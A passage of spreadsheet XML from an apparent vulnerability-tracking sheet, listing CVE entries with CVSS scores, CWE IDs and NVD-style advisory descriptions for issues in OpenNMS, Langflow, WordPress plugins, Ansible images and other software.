          <t>CVE-2026-89089</t>
        </is>
      </c>
      <c r="C4142" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4142" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4142" s="5" t="inlineStr"/>
      <c r="F4142" s="5" t="inlineStr"/>
      <c r="G4142" s="5" t="inlineStr"/>
      <c r="H4142" s="5" t="inlineStr"/>
      <c r="I4142" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4142" s="5" t="inlineStr"/>
      <c r="K4142" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L4142" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability exists in the JasperReports-based reporting feature of multiple versions of OpenNMS Meridian and Horizon. A low-privileged authenticated user (ROLE_USER) can run the shipped, default-enabled online reports "Maintenance contracts expired" (AssetManagementMaintExpired) and "Maintenance contracts strategy" (AssetManagementMaintStrategy) via the reporting REST API (POST /rest/reports/{id}) and supply a DATE_FORMAT parameter that the report templates substitute literally, un-escaped, into their SQL queries. This lets an attacker execute arbitrary SQL against the OpenNMS database and read arbitrary data, including database-stored secrets such as provisioning and notification credentials and SNMP community strings.
The solution is to upgrade to Meridian 2024.3.13, 2025.0.10 and Horizon 36.0.4 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.</t>
        </is>
      </c>
      <c r="M4142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89089</t>
        </is>
      </c>
    </row>
    <row r="4143">
      <c r="A4143" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89158</t>
        </is>
      </c>
      <c r="C4143" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4143" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4143" s="5" t="inlineStr"/>
      <c r="F4143" s="5" t="inlineStr"/>
      <c r="G4143" s="5" t="inlineStr"/>
      <c r="H4143" s="5" t="inlineStr"/>
      <c r="I4143" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4143" s="5" t="inlineStr"/>
      <c r="K4143" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L4143" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48, on 32-bit platforms, has a pcre2_compile_32 integer overflow and resultant out-of-bounds write.</t>
        </is>
      </c>
      <c r="M4143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89158</t>
        </is>
      </c>
    </row>
    <row r="4144">
      <c r="A4144" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9138</t>
        </is>
      </c>
      <c r="C4144" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4144" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4144" s="5" t="inlineStr"/>
      <c r="F4144" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4144" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H4144" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I4144" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4144" s="5" t="inlineStr"/>
      <c r="K4144" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4144" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 Langflow could allow an authenticated attacker to write arbitrary files to the server due to improper input validation in the SaveToFileComponent. The application constructs local file paths using attacker‑controlled input without sufficient sanitization when handling requests to the /api/v1/run/{flow_id} endpoint. An attacker with low‑privileged authenticated access (such as a valid API key or user session) can supply crafted path values, including absolute paths or path traversal sequences, allowing arbitrary file writes to locations writable by the Langflow process. Successful exploitation may lead to unauthorized file creation or modification, potentially resulting in further compromise depending on the deployment environment.</t>
        </is>
      </c>
      <c r="M4144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9138</t>
        </is>
      </c>
    </row>
    <row r="4145">
      <c r="A4145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9186</t>
        </is>
      </c>
      <c r="C4145" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4145" s="5" t="inlineStr"/>
      <c r="F4145" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4145" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H4145" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I4145" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4145" s="5" t="inlineStr"/>
      <c r="K4145" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L4145" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 allows remote authenticated attackers to bypass localhost-only MCP configuration installation by spoofing X-Forwarded-For: 127.0.0.1 header, enabling arbitrary writes to IDE config files (~/.cursor/mcp.json, etc.).</t>
        </is>
      </c>
      <c r="M4145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9186</t>
        </is>
      </c>
    </row>
    <row r="4146">
      <c r="A4146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9225</t>
        </is>
      </c>
      <c r="C4146" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4146" s="5" t="inlineStr"/>
      <c r="F4146" s="5" t="inlineStr"/>
      <c r="G4146" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4146" s="5" t="inlineStr"/>
      <c r="I4146" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4146" s="5" t="inlineStr"/>
      <c r="K4146" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4146" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 Langflow could allow an authenticated attacker to access sensitive files belonging to other users due to improper access control in the File/Read File component. When executing flows through the /api/v1/run/advanced/{flow_id} endpoint, the application allows component inputs to reference storage paths using arbitrary user or flow identifiers without verifying ownership. An attacker with low‑privileged authenticated access can supply a crafted file path pointing to another user’s storage namespace, causing the backend to read and return the contents of files uploaded by other users. This vulnerability bypasses intended authorization checks enforced by the file management API and may result in unauthorized disclosure of sensitive user data.</t>
        </is>
      </c>
      <c r="M4146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9225</t>
        </is>
      </c>
    </row>
    <row r="4147">
      <c r="A4147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9336</t>
        </is>
      </c>
      <c r="C4147" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4147" s="5" t="inlineStr"/>
      <c r="F4147" s="5" t="inlineStr"/>
      <c r="G4147" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H4147" s="5" t="inlineStr"/>
      <c r="I4147" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4147" s="5" t="inlineStr"/>
      <c r="K4147" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L4147"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M4147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9336</t>
        </is>
      </c>
    </row>
    <row r="4148">
      <c r="A4148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9745</t>
        </is>
      </c>
      <c r="C4148" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D4148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4148" s="5" t="inlineStr"/>
      <c r="F4148" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4148" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H4148" s="5" t="inlineStr">
        <is>
          <t>ibm:netezza_performance_server</t>
        </is>
      </c>
      <c r="I4148" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4148" s="5" t="inlineStr"/>
      <c r="K4148" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="L4148" s="5" t="inlineStr">
        <is>
          <t>IBM Netezza Software 11.3.0.3 through Interim Fix 002 has operations that are performed without validating bucket ownership using the ExpectedBucketOwner parameter. This omission may allow a remote attacker to exploit misconfigurations or naming collisions to redirect application requests to an unintended S3 bucket under their control.</t>
        </is>
      </c>
      <c r="M4148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9745</t>
        </is>
      </c>
    </row>
    <row r="4149">
      <c r="A4149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4149" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-57847</t>
        </is>
      </c>
      <c r="C4149" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4149" s="5" t="inlineStr"/>
      <c r="F4149" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4149" s="5" t="inlineStr"/>
      <c r="H4149" s="5" t="inlineStr">
        <is>
          <t>redhat:ansible_automation_platform</t>
        </is>
      </c>
      <c r="I4149" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J4149" s="5" t="inlineStr"/>
      <c r="K4149" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L4149" s="5" t="inlineStr">
        <is>
          <t>A container privilege escalation flaw was found in certain Ansible Automation Platform images. This issue arises from the /etc/passwd file being created with group-writable permissions during the build process. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This vulnerability allows an attacker to add a new user with any arbitrary UID, including UID 0, gaining full root privileges within the container.</t>
        </is>
      </c>
      <c r="M4149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-57847</t>
        </is>
      </c>
    </row>
    <row r="4150">
      <c r="A4150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4150" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-7195</t>
        </is>
      </c>
      <c r="C4150" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4150" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4150" s="5" t="inlineStr"/>
      <c r="F4150" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4150" s="5" t="inlineStr"/>
      <c r="H4150" s="5" t="inlineStr"/>
      <c r="I4150" s="5" t="inlineStr">
        <is>
          <t>2025-08-07</t>
        </is>
      </c>
      <c r="J4150" s="5" t="inlineStr"/>
      <c r="K4150" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="L4150" s="5" t="inlineStr">
        <is>
          <t>Early versions of Operator-SDK provided an insecure method to allow operator containers to run in environments that used a random UID. Operator-SDK before 0.15.2 provided a script, user_setup, which modifies the permissions of the /etc/passwd file to 664 during build time. Developers who used Operator-SDK before 0.15.2 to scaffold their operator may still be impacted by this if the insecure user_setup script is still being used to build new container images. 
In affected images, the /etc/passwd file is created during build time with group-writable permissions and a group ownership of root (gid=0). An attacker who can execute commands within an affected container, even as a non-root user, may be able to leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.</t>
        </is>
      </c>
      <c r="M4150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-7195</t>
        </is>
      </c>
    </row>
    <row r="4151">
      <c r="A4151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12230</t>
        </is>
      </c>
      <c r="C4151" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4151" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4151" s="5" t="inlineStr"/>
      <c r="F4151" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4151" s="5" t="inlineStr"/>
      <c r="H4151" s="5" t="inlineStr"/>
      <c r="I4151" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4151" s="5" t="inlineStr"/>
      <c r="K4151" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4151" s="5" t="inlineStr">
        <is>
          <t>The LearnPress – WordPress LMS Plugin for Create and Sell Online Courses plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'layout_custom_css' parameter in all versions up to, and including, 4.3.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12230</t>
        </is>
      </c>
    </row>
    <row r="4152">
      <c r="A4152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13709</t>
        </is>
      </c>
      <c r="C4152" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4152" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4152" s="5" t="inlineStr"/>
      <c r="F4152" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4152" s="5" t="inlineStr"/>
      <c r="H4152" s="5" t="inlineStr"/>
      <c r="I4152" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4152" s="5" t="inlineStr"/>
      <c r="K4152" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4152" s="5" t="inlineStr">
        <is>
          <t>The Graphina – Charts and Graphs For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'iq_tree_tree_chart_template' Widget Setting in all versions up to, and including, 3.1.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13709</t>
        </is>
      </c>
    </row>
    <row r="4153">
      <c r="A4153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15796</t>
        </is>
      </c>
      <c r="C4153" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4153" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4153" s="5" t="inlineStr"/>
      <c r="F4153" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4153" s="5" t="inlineStr"/>
      <c r="H4153" s="5" t="inlineStr"/>
      <c r="I4153" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4153" s="5" t="inlineStr"/>
      <c r="K4153" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4153" s="5" t="inlineStr">
        <is>
          <t>The Builderall for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'bg_video_service_url' Setting in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15796</t>
        </is>
      </c>
    </row>
    <row r="4154">
      <c r="A4154" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15820</t>
        </is>
      </c>
      <c r="C4154" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4154" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4154" s="5" t="inlineStr"/>
      <c r="F4154" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4154" s="5" t="inlineStr"/>
      <c r="H4154" s="5" t="inlineStr"/>
      <c r="I4154" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4154" s="5" t="inlineStr"/>
      <c r="K4154" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4154" s="5" t="inlineStr">
        <is>
          <t>The Builderall for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Photo Module 'attributes' Setting in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15820</t>
        </is>
      </c>
    </row>
    <row r="4155">
      <c r="A4155" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15889</t>
        </is>
      </c>
      <c r="C4155" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4155" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4155" s="5" t="inlineStr"/>
      <c r="F4155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4155" s="5" t="inlineStr"/>
      <c r="H4155" s="5" t="inlineStr"/>
      <c r="I4155" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4155" s="5" t="inlineStr"/>
      <c r="K4155" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4155" s="5" t="inlineStr">
        <is>
          <t>The Aruba HiSpeed Cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Content in all versions up to, and including, 3.0.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15889</t>
        </is>
      </c>
    </row>
    <row r="4156">
      <c r="A4156" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17149</t>
        </is>
      </c>
      <c r="C4156" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4156" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4156" s="5" t="inlineStr"/>
      <c r="F4156" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4156" s="5" t="inlineStr"/>
      <c r="H4156" s="5" t="inlineStr"/>
      <c r="I4156" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4156" s="5" t="inlineStr"/>
      <c r="K4156" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4156" s="5" t="inlineStr">
        <is>
          <t>The Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'wrapper' Shortcode Attribute in all versions up to, and including, 3.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17149</t>
        </is>
      </c>
    </row>
    <row r="4157">
      <c r="A4157" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18404</t>
        </is>
      </c>
      <c r="C4157" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4157" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4157" s="5" t="inlineStr"/>
      <c r="F4157" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4157" s="5" t="inlineStr"/>
      <c r="H4157" s="5" t="inlineStr"/>
      <c r="I4157" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4157" s="5" t="inlineStr"/>
      <c r="K4157" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4157" s="5" t="inlineStr">
        <is>
          <t>The Social Chat – Click To Chat App Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'consent_message' JSON Attribute in .qlwapp data-box in all versions up to, and including, 8.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploit requires no user interaction beyond page load, as setting auto_open and consent_enabled to 'yes' in the injected data-box JSON causes the consent box — and the embedded script — to execute immediately on page load.</t>
        </is>
      </c>
      <c r="M4157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18404</t>
        </is>
      </c>
    </row>
    <row r="4158">
      <c r="A4158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19634</t>
        </is>
      </c>
      <c r="C4158" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4158" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4158" s="5" t="inlineStr"/>
      <c r="F4158" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4158" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H4158" s="5" t="inlineStr"/>
      <c r="I4158" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J4158" s="5" t="inlineStr"/>
      <c r="K4158" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L4158" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a SQL injection vulnerability in two import functions. A user can create a malicious JSON document containing specially crafted object names. If a superuser subsequently calls anon.import_database_rules() or anon.import_roles_rules(), the malicious code is executed with superuser privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later</t>
        </is>
      </c>
      <c r="M4158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19634</t>
        </is>
      </c>
    </row>
    <row r="4159">
      <c r="A4159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19945</t>
        </is>
      </c>
      <c r="C4159" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4159" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4159" s="5" t="inlineStr"/>
      <c r="F4159" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4159" s="5" t="inlineStr"/>
      <c r="H4159" s="5" t="inlineStr"/>
      <c r="I4159" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4159" s="5" t="inlineStr"/>
      <c r="K4159" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4159" s="5" t="inlineStr">
        <is>
          <t>The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'first_name' parameter in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. An administrator viewing any user's profile via the ?show_user_id= parameter will render the attacker's stored payload in the admin's browser session, enabling cross-privilege script execution.</t>
        </is>
      </c>
      <c r="M4159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19945</t>
        </is>
      </c>
    </row>
    <row r="4160">
      <c r="A4160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2390</t>
        </is>
      </c>
      <c r="C4160" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4160" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4160" s="5" t="inlineStr"/>
      <c r="F4160" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4160" s="5" t="inlineStr"/>
      <c r="H4160" s="5" t="inlineStr"/>
      <c r="I4160" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4160" s="5" t="inlineStr"/>
      <c r="K4160" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4160" s="5" t="inlineStr">
        <is>
          <t>The Powerkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Lazy Load module's image processing in all versions up to, and including, 3.0.4. This is due to the 'content_process_images' function using a flawed regex-based HTML attribute parser. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="M4160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2390</t>
        </is>
      </c>
    </row>
    <row r="4161">
      <c r="A4161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33388</t>
        </is>
      </c>
      <c r="C4161" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4161" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4161" s="5" t="inlineStr"/>
      <c r="F4161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4161" s="5" t="inlineStr"/>
      <c r="H4161" s="5" t="inlineStr"/>
      <c r="I4161" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4161" s="5" t="inlineStr"/>
      <c r="K4161" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4161" s="5" t="inlineStr">
        <is>
          <t>An access control vulnerability was discovered in the Credentials Manager functionality due to insufficient validation of user privileges. A remote authenticated user with limited privileges can view a limited subset of the available entries in the Credentials Manager. The actual credential values are not directly visible, but the user can delete entries or edit their properties. An attacker who deletes or edits an entry can disrupt authentication for dependent devices, and one who manipulates an entry's configuration may be able to indirectly obtain the credentials.</t>
        </is>
      </c>
      <c r="M4161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33388</t>
        </is>
      </c>
    </row>
    <row r="4162">
      <c r="A4162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3853</t>
        </is>
      </c>
      <c r="C4162" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="D4162" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4162" s="5" t="inlineStr"/>
      <c r="F4162" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4162" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
